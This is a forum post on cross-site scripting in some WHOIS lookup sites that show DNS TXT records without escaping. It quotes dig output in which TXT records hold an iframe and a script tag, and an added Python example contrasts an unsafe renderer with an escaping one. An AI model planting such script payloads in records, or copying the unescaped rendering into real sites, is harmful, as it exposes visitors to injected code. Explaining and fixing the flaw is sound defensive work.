
XSS vulnerability in some WHOIS providers... via TXT records


Post by Zancarius » Thu Sep 18, 2014 11:05 am

That's right, XSS vulnerabilities are present in some WHOIS providers. All you have to do is put something in the TXT record of a domain you control, and anyone who visits the appropriately affected site gets Rick-Rolled.

(XSS = Cross-site Scripting vulnerability.)

Here's what the onerous TXT record appears to be as of this writing:

[gridlock:~]$ dig txt

; <<>> DiG 9.9.2-P2 <<>> txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22275
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

; EDNS: version: 0, flags:; udp: 4096
;            IN      TXT

;; ANSWER SECTION:
300     IN      TXT     "<iframe width='420' height='315' src='//' frameborder='0' allowfullscreen></iframe>"
300     IN      TXT     "v=spf1 ?all"
300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
300     IN      TXT     "<script src='//'></script>"

;; AUTHORITY SECTION:
172800  IN      NS
172800  IN      NS

;; ADDITIONAL SECTION:
12161   IN      A
12161   IN      AAAA    2400:cb00:2049:1::adf5:3b74

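An added example, not part of the original post: how a lookup page that displays TXT records ends up with this flaw, and the output escaping that closes it. The domain example.test, the record contents and the function names are constructed for illustration.

```python
import html
import re

# Constructed sample of a dig-style ANSWER section; example.test and the
# record contents are placeholders, not the records from the post.
SAMPLE_ANSWER = '''\
example.test. 300 IN TXT "v=spf1 ?all"
example.test. 300 IN TXT "<script src='//cdn.example.test/x.js'></script>"
example.test. 300 IN TXT "split " "across \\"two\\" strings"
'''

# One quoted character-string, allowing backslash escapes inside it.
_CHARSTR = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_txt(answer):
    """Return (owner, ttl, text) per TXT line; character-strings are joined."""
    records = []
    for line in answer.splitlines():
        fields = line.split(None, 4)
        if len(fields) < 5 or fields[2] != "IN" or fields[3] != "TXT":
            continue
        parts = [re.sub(r"\\(.)", r"\1", s) for s in _CHARSTR.findall(fields[4])]
        records.append((fields[0], int(fields[1]), "".join(parts)))
    return records


def render_unsafe(records):
    """The flaw: record data is pasted into the page as markup."""
    return "".join(f"<tr><td>{o}</td><td>{t}</td></tr>" for o, _, t in records)


def render_safe(records):
    """Treat every DNS field as untrusted text and escape it on output."""
    return "".join(
        f"<tr><td>{html.escape(o)}</td><td>{html.escape(t)}</td></tr>"
        for o, _, t in records
    )


if __name__ == "__main__":
    print(render_safe(parse_txt(SAMPLE_ANSWER)))
```

Escaping belongs at the point of output, for every field that came from DNS or WHOIS, since the domain owner controls all of it.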